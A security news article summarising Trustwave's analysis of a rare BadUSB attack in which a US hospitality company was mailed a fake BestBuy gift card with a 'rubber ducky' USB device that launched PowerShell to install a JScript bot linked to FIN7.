A Rare BadUSB Attack Going Under Analysis
The attack in question was highly targeted, and deployed a very cunning social engineering trick using a fake gift card and physical media, known as “rubber ducky”. A “rubber ducky” is a malicious USB keyboard preloaded with keystrokes, which looks like a regular USB stick.
“Those types of attacks are typically so explicitly targeted that it’s rare to find them coming from actual attackers in the wild. Rare, but still out there,” Trustwave says.
An undisclosed US hospitality provider. The company received an envelope containing a fake BestBuy gift card and a USB thumb drive. The company was instructed to plug the USB into a computer to access a list of items for the gift card to be used. However, the USB turned out to be a “rubber ducky” also known as BadUSB – a very rare attack that functions as a keyboard when connected to a PC. The attack emulates keypresses aiming to launch a series of automated attacks.
The good news is that the targeted company suspected that this was a malicious attempt, and reached out to Trustwave. The security experts say in their report that once they plugged the BadUSB, it initiated a series of automated keypresses that launched a PowerShell command.
To start the analysis, we inspected the drive for inscriptions such as serial numbers. At the head of the drive on the printed circuit board we saw “HW-374”. A quick Google search for this string found a “BadUSB Leonardo USB ATMEGA32U4” for sale on shopee.tw, the report says.
BadUSB Attack Downloads Unknown Malware
The PowerShell command downloaded a PowerShell script from a website, and then installed specific malware on the researchers’ machine identified as a Jscript-based bot. Apparently, while performing this analysis the researchers could not find another similar strain of this malware.
“The malware is unknown to us. It is also hard to say if it is custom-built, but it probably is, because it is not wide spread and seems to be targeted,” Phil Hay, Senior Research Manager at Trustwave said in an email correspondence with ZDNet.
Shortly after the initial analysis, however, Trustwave discovered a file similar to the unknown malware uploaded on VirusTotal. Further analysis by fellow cybersecurity researchers at Facebook and Kaspersky reveals that the unknown malware is most likely coined by a hacking group called FIN7, believed to be behind the Carbanak malware. Researchers are unaware whether the file was uploaded by another cybersecurity company currently investigating the same strain, or by somebody else.
This rare hacking attempt serves as an example that BadUSB attacks do take place in the real world. The last such attack was detailed in 2018 by Kaspersky researchers.
A curious fact is that a rubber ducky attack was mentioned in an episode of the TV show Mr Robot. In that specific Season 2 episode, Angela had to use a rubber ducky in case she failed with the femtocell hack. She had to plug in the rubber ducky, and plug it out in a few seconds. This would have granted fsociety a hold of multiple FBI passwords.